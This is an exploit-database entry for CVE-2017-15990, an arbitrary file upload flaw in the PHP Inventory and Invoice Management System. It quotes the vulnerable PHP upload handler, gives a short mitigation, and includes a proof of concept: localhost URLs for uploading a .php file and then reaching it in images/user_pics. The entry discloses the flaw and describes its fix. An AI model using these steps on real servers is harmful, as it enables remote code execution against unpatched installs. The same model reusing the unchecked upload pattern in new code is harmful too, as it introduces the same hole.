header-logo
Suggest Exploit
vendor:
PHP Inventory and Invoice Management System
by:
Ihsan Sencan
9,8
CVSS
CRITICAL
Arbitrary File Upload
434
CWE
Product Name: PHP Inventory and Invoice Management System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2017-15990
CPE: a:savsofteproducts:php_inventory_and_invoice_management_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017

Php Inventory & Invoice Management System – Arbitrary File Upload

The vulnerability allows an users upload arbitrary file. Vulnerable source code can be found in the text. Proof of concept is provided in the text.

Mitigation:

Restrict access to the upload folder and ensure that the uploaded files are validated before being stored on the server.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Php Inventory & Invoice Management System - Arbitrary File Upload
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://savsofteproducts.com/
# Software Link: http://www.phpinventory.com/
# Demo: http://phpinventory.com/phpinventory_demo/ 
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15990
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# 
# The vulnerability allows an users upload arbitrary file....
# 
# Vulnerable Source:
#
# .............1
# if($_FILES['userfile']['name']!=''){	
#	$target = 'images/user_pics/';
#	$targets = $target . basename( $_FILES['userfile']['name']);
#	$docadd=($_FILES['userfile']['name']);
#	if(move_uploaded_file($_FILES['userfile']['tmp_name'], $targets))
#		{
#			$pfilename=$_FILES['userfile']['name'];
#			$filename=time().$pfilename;
#			$new_path=$target.$filename;
#			rename($targets,$new_path);
#		}
#
#}else{
#$filename=$_POST['user_picname'];
#}
# .............2,3,4
# $target = 'images/logo/';
# $target = 'images/product_images/';
# $target = 'images/service_providers/';
# Etc..
# .............
#
# Proof of Concept: 
# 
# http://localhost/[PATH]/index.php/dashboard/edit_myaccountdetail/
# 
# http://localhost/[PATH]/images/user_pics/[...].php
# 
# Etc..
# # # # #

Navigation

Suggest Exploit

Services By CQR